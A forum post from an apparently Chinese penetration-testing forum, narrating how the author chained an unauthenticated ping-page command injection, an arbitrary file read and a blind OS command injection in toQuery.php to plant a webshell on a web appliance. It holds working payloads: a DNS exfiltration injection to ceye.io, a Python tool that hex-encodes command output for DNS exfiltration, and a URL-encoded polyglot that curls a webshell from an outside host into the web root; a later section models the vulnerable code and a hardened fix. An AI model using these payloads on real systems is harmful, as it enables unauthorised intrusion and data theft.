中国网络渗透测试联盟

Title: Web Security in Practice: getting a webshell through an OS command injection vulnerability

Author: admin    Time: 2022-3-31 01:39
**1. Finding a way in**

**Viewing the page source (right-click, View Source) showed a fingerprint for the system: images/select_bg.png. Searching for it on ZoomEye (钟馗之眼) gave the following:**
![image.png](data/attachment/forum/202203/31/013456oll79nxwhwxz9h2l.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")
**Both "reporter" and [Technology, Inc.](https://www.zoomeye.org/searchRe ... title:%22Technology,%20Inc.%22&t=all) carry this fingerprint. I had worked on this system before and had its source code; comparing the target against the source tree turned up a page that can be reached without authentication.**
**The address is:**

[http://1.1.1.1//view/systemConfi ... ;text_packetsize=64](http://1.1.1.1/view/systemConfig ... ;text_packetsize=64) **, as shown:**
% ?$ [: m6 K- `$ O3 E
![image.png](data/attachment/forum/202203/31/013528hffsyjijhb58lhh5.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")

**Testing the ping function on this page showed that the input breaks out of ping's normal function and executes commands. The payload was:**

`` `whoami`.1111.ceye.io ``

**The shell expands the backticks before ping runs, so ping tries to resolve the output of whoami followed by .1111.ceye.io, and the command output arrives as a DNS query in the ceye.io log, as shown:**
![image.png](data/attachment/forum/202203/31/013559bwl0r0lrgkpm8lrw.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")

**The DNS record that came back:**

![image.png](data/attachment/forum/202203/31/013625ei2ea2ealisblpsb.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")

**The current user is root.**
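The ping check above in tool form, as an added example that is not part of the original post: it builds the same kind of command-substitution payload the author submitted (the command's output becomes the hostname that ping resolves), but hex-encodes the output and splits it into DNS labels so that arbitrary output, not just a single word like root, survives the trip, and it decodes the resulting queries back out of a DNS log. The domain 1111.ceye.io is the author's; the sample log lines and their column layout are constructed for the example.

```python
"""Blind command injection in the ping form, confirmed over DNS.

The ping handler hands the submitted host to a shell, so a command
substitution placed where the hostname goes is expanded before ping runs,
and ping then resolves <command output>.<your domain>: the lookup reaches
the authoritative server for that domain and shows up in its log. Raw
output is not label-safe (spaces, slashes, length), so the payload below
hex-encodes it and splits it into DNS labels; decode_oob() reverses that.
"""
import binascii
import re

OOB_DOMAIN = "1111.ceye.io"  # the post's DNSLog domain; use one whose resolver you control
LABEL_LEN = 60               # a DNS label holds at most 63 octets; 60 keeps hex pairs whole


def oob_payload(command, domain=OOB_DOMAIN, label_len=LABEL_LEN):
    """Value to submit in the ping field so that ping resolves hex(output).<domain>.

    od replaces xxd (often missing on appliances); fold/paste turn the hex
    string into dot-separated labels. Only POSIX tools are used, and $( )
    rather than backticks so the inner pipeline needs no escaping.
    """
    encoder = "od -An -tx1 | tr -d ' \\n' | fold -w %d | paste -s -d ." % label_len
    return "$(%s | %s).%s" % (command, encoder, domain)


def decode_oob(log_text, domain=OOB_DOMAIN):
    """Recover every exfiltrated value from a DNS log, in first-seen order.

    Resolvers retry, so identical names are collapsed. A name whose labels
    are not valid hex (a probe, a typo) is returned raw rather than dropped.
    """
    pattern = re.compile(r"(?<![\w.-])([0-9A-Za-z.-]+)\." + re.escape(domain) + r"(?![\w.-])")
    seen, values = set(), []
    for name in pattern.findall(log_text):
        name = name.lower()          # DNS names are case-insensitive
        if name in seen:
            continue
        seen.add(name)
        try:
            values.append(binascii.unhexlify(name.replace(".", "")).decode("utf-8", "replace"))
        except (binascii.Error, ValueError):
            values.append(name)
    return values


# Constructed sample of a DNSLog panel (not real captures): the `whoami` hit
# and its resolver retry, then an `id` hit long enough to span two labels.
SAMPLE_DNSLOG = """\
2022-03-31 01:36:01  726f6f740a.1111.ceye.io  203.0.113.10
2022-03-31 01:36:01  726f6f740a.1111.ceye.io  203.0.113.10
2022-03-31 01:37:15  7569643d3028726f6f7429206769643d3028726f6f74292067726f757073.3d3028726f6f74290a.1111.ceye.io  203.0.113.10
"""

if __name__ == "__main__":
    print("submit in the ping field:", oob_payload("id"))
    for value in decode_oob(SAMPLE_DNSLOG):
        print("exfiltrated:", repr(value))
```

One query name is limited to 253 octets, so a long command output needs several requests (for example `head -c` / `tail -c` windows of the output); the decoder handles each hit independently, so the pieces can be joined afterwards.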
**2. Chaining the vulnerabilities to get a webshell**
**This write-up follows the order in which the bugs were found. The next step was to run pwd through the same injection to get the web path, as shown:**

![image.png](data/attachment/forum/202203/31/013656tl9z2765580yd7t8.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")

**This gives the site path: /var/www/html/view/systemconfig/systemtool/**
**Burp Suite had also turned up an OS command injection and an arbitrary file read; the screenshot below is of the arbitrary file read:**
![image.png](data/attachment/forum/202203/31/013726cn3oj66ngggc6zz8.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")

**The OS command injection is in /var/www/html/view/Behavior/toQuery.php. This path was obtained through the command execution from step one (breaking out of ping's normal function); with the arbitrary file read we pulled the file's source:**
![image.png](data/attachment/forum/202203/31/013749x0i8ilbkiuelle4e.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")
**The source:**

```php
<?php
include_once($_SERVER["DOCUMENT_ROOT"]."/model/charFilter.php");
?>
<?php
session_start();

if ($_GET["objClass"] == "")
    exit();

$param = $_REQUEST;

//echo "\n--------------------------\n";
//print_r($param);
//echo "\n--------------------------\n";

if ($_GET["method"] == "getList" || $_GET["method"] == "import" || $_GET["method"] == "processAlarm") {
    $param["user"] = $_SESSION["s_userName"];
    $param["lan"] = $_SESSION["lan"];
    $param["regUserpath"] = $_SESSION["regUserpath"];

    exec("rm -rf /tmp/cache");

    $cmd = "/usr/local/php/bin/php " . $_SERVER["DOCUMENT_ROOT"] . "system/behavior/behavior_query.php";
    // objClass and method come straight from the query string with no validation
    // and no escapeshellarg(), so any shell metacharacters in them are interpreted
    // by the shell that exec() spawns below
    $cmd .= " " . $_GET["objClass"];
    $cmd .= " " . $_GET["method"];
    $cmd .= " " . base64_encode(json_encode($param));

    file_put_contents("/tmp/query_cmd", $cmd);

    // output goes to /dev/null and the job is backgrounded: the injection is blind
    exec($cmd . " > /dev/null &");
} else {
    require_once($_SERVER["DOCUMENT_ROOT"] . "system/behavior/behavior_Detail.php");
    $obj = new QueryInterface();
    $instance = $obj->getInstance();
    $instance->invokeMethod($_GET["objClass"], $_GET["method"], $param);
}

exit();
?>
```
**A quick read of the source shows the problem. When method is one of getList, import or processAlarm, the script builds `$cmd = "/usr/local/php/bin/php " . $_SERVER["DOCUMENT_ROOT"] . "system/behavior/behavior_query.php"`, i.e. the PHP CLI binary followed by the absolute path of behavior_query.php. It then appends `$_GET["objClass"]` and `$_GET["method"]`, each separated by a space, with no validation and no escapeshellarg(), writes the finished command to /tmp/query_cmd with file_put_contents(), and finally runs `exec($cmd . " > /dev/null &")`. objClass therefore lands unquoted in a shell command line, which is a straightforward OS command injection. It is also blind: stdout is discarded and the job is backgrounded, so nothing comes back in the HTTP response. The demonstration follows.**
![image.png](data/attachment/forum/202203/31/013842ceg7htegblnr4nnk.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")
**In the screenshot, objClass= is the OS command injection point. I had first tried a bash reverse shell, but after a whole night of testing it never called back, so I settled on using curl to download the webshell. The payload:**
```text
%7Ccurl%20http%3A%2F%2F1.1.1.1%2FqYCwxRz1.zip%20-o%20%2Fvar%2Fwww%2Fhtml%2Fimages%2Fsuiji2.php%7C%7C%60pcurl%20http%3A%2F%2F1.1.1.1%2FqYCwxRz1.zip%20-o%20%2Fvar%2Fwww%2Fhtml%2Fimages%2Fsuiji2.php%60%20%23%27%20%7Ccurl%20http%3A%2F%2F1.1.1.1%2FqYCwxRz1.zip%20-o%20%2Fvar%2Fwww%2Fhtml%2Fimages%2Fsuiji2.php%7C%7C%60curl%20http%3A%2F%2F1.1.1.1%2FqYCwxRz1.zip%20-o%20%2Fvar%2Fwww%2Fhtml%2Fimages%2Fsuiji2.php%60%20%23%5C%22%20%7Ccurl%20http%3A%2F%2F1.1.1.1%2FqYCwxRz1.zip%20-o%20%2Fvar%2Fwww%2Fhtml%2Fimages%2Fsuiji2.php
```
**URL-decoded:**
- z) Z& V  G8 t, b3 O& s, H
```text
|curl http://1.1.1.1/qYCwxRz1.zip -o /var/www/html/images/suiji2.php||`pcurl http://1.1.1.1/qYCwxRz1.zip -o /var/www/html/images/suiji2.php` #' |curl http://1.1.1.1/qYCwxRz1.zip -o /var/www/html/images/suiji2.php||`curl http://1.1.1.1/qYCwxRz1.zip -o /var/www/html/images/suiji2.php` #\" |curl http://1.1.1.1/qYCwxRz1.zip -o /var/www/html/images/suiji2.php
```
**The repeated `|`, `||`, backtick and `#` fragments are there so that the payload closes off whatever context the parameter lands in: `|` starts a new pipeline stage, `||` runs the download even if the preceding command fails, and `#` comments out everything the script appends after objClass (the method, the base64 blob and `> /dev/null &`). In this script objClass is concatenated unquoted, so the leading `|curl ...` alone is already enough. curl fetched the webshell successfully, as shown:**

![image.png](data/attachment/forum/202203/31/013922zdonl51onkonxqqz.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")
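To make the audit concrete, here is an added example (not the vendor's code and not from the original post) that models toQuery.php's command builder in Python: the vulnerable concatenation exactly as the PHP does it, the effect of quoting alone (escapeshellarg() in PHP, shlex.quote() here), and an allow-listed version, together with a small splitter that shows which commands the shell actually runs when the author's payload is supplied as objClass. The DOCUMENT_ROOT value, the class-name pattern and the empty session values are assumptions.

```python
"""Command-line model of toQuery.php, beside a hardened builder.

build_cmd_vulnerable() concatenates like the PHP above; build_cmd_quoted()
shows what escapeshellarg() alone would have done; build_cmd_hardened()
adds the allow-list that should have been there. pipeline_commands() splits
a command line the way a POSIX shell does, so the extra commands an injected
objClass creates are visible.
"""
import base64
import json
import re
import shlex

PHP_BIN = "/usr/local/php/bin/php"
DOCUMENT_ROOT = "/var/www/html/"   # assumption: trailing slash, which the original concatenation relies on
SCRIPT = "system/behavior/behavior_query.php"
ALLOWED_METHODS = ("getList", "import", "processAlarm")   # the three values the script accepts
SAFE_NAME = re.compile(r"^[A-Za-z][A-Za-z0-9_]{0,63}$")   # assumed shape of a legitimate objClass
CONTROL_OPERATORS = {"|", "||", "&&", ";", "&"}

# The post's URL-decoded payload (1.1.1.1 is the author's redaction of the download host).
POST_PAYLOAD = (
    "|curl http://1.1.1.1/qYCwxRz1.zip -o /var/www/html/images/suiji2.php"
    "||`pcurl http://1.1.1.1/qYCwxRz1.zip -o /var/www/html/images/suiji2.php` #' "
    "|curl http://1.1.1.1/qYCwxRz1.zip -o /var/www/html/images/suiji2.php"
    "||`curl http://1.1.1.1/qYCwxRz1.zip -o /var/www/html/images/suiji2.php` #\\\" "
    "|curl http://1.1.1.1/qYCwxRz1.zip -o /var/www/html/images/suiji2.php"
)


def _param_blob(get, session):
    """base64(json(param)) as the script builds it; session values are empty for an unauthenticated caller."""
    param = dict(get)
    for key, sess_key in (("user", "s_userName"), ("lan", "lan"), ("regUserpath", "regUserpath")):
        param[key] = session.get(sess_key, "")
    return base64.b64encode(json.dumps(param, separators=(",", ":")).encode()).decode()


def build_cmd_vulnerable(get, session=None):
    """Same concatenation as toQuery.php: objClass and method go in unquoted."""
    session = session or {}
    cmd = PHP_BIN + " " + DOCUMENT_ROOT + SCRIPT
    cmd += " " + get["objClass"]
    cmd += " " + get["method"]
    cmd += " " + _param_blob(get, session)
    return cmd + " > /dev/null &"


def build_cmd_quoted(get, session=None):
    """escapeshellarg() alone (shlex.quote() is the Python equivalent): the whole value becomes one literal word."""
    session = session or {}
    words = [PHP_BIN, DOCUMENT_ROOT + SCRIPT, get["objClass"], get["method"], _param_blob(get, session)]
    return " ".join(shlex.quote(w) for w in words) + " > /dev/null &"


def build_cmd_hardened(get, session=None):
    """Allow-list first, quote second. Raises instead of building anything for bad input."""
    obj_class, method = get.get("objClass", ""), get.get("method", "")
    if not SAFE_NAME.match(obj_class):
        raise ValueError("objClass rejected: %r" % obj_class)
    if method not in ALLOWED_METHODS:
        raise ValueError("method rejected: %r" % method)
    return build_cmd_quoted(get, session)


def pipeline_commands(cmd):
    """Split a command line into word lists at the shell control operators.

    Redirection words (> /dev/null) stay with their command. An unquoted '#'
    at the start of a word begins a comment, as in sh: that is why the post's
    polyglot ends each branch in '#', it drops the method, the base64 blob and
    the '> /dev/null &' the script appends.
    """
    lex = shlex.shlex(cmd, posix=True, punctuation_chars=True)
    lex.whitespace_split = True
    commands, current = [], []
    for tok in lex:
        if tok in CONTROL_OPERATORS:
            if current:
                commands.append(current)
            current = []
        else:
            current.append(tok)
    if current:
        commands.append(current)
    return commands


if __name__ == "__main__":
    get = {"objClass": POST_PAYLOAD, "method": "getList"}
    for words in pipeline_commands(build_cmd_vulnerable(get)):
        print("shell runs:", " ".join(words))
    print("quoted builder: %d command(s)" % len(pipeline_commands(build_cmd_quoted(get))))
    try:
        build_cmd_hardened(get)
    except ValueError as err:
        print("hardened builder:", err)
```

Running it shows three commands for the vulnerable builder (the php invocation, the curl download, and the backtick branch; everything after the first `#` is gone, including the redirection), a single command for the quoted builder, and a rejection from the hardened one. Quoting alone turns the whole objClass into one argument of behavior_query.php; the allow-list is still wanted because that script then treats the value as a class name. In PHP 7.4 and later the cleaner fix is to hand proc_open() an argument array so that no shell is involved at all.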
**3. Summary**
**This case ended in a webshell largely because several vulnerabilities could be chained. First, viewing the page source identified the system in use, one I had tested a similar version of before. Knowing the target, I found the unauthenticated ping page, broke out of ping's normal function to run pwd and obtain the site's absolute path, then used the arbitrary file read to pull the PHP file suspected of OS command execution and audited it briefly, confirming the vulnerability. Finally I built the OS command execution payload and got the webshell. The whole process is a chain of vulnerabilities, and penetration testing often comes down to luck: had any one link in the chain been missing or gone unfound, getting the webshell might have failed.**

**In short, luck and bug-hunting skill matter equally. Thanks for reading!**
Welcome to 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2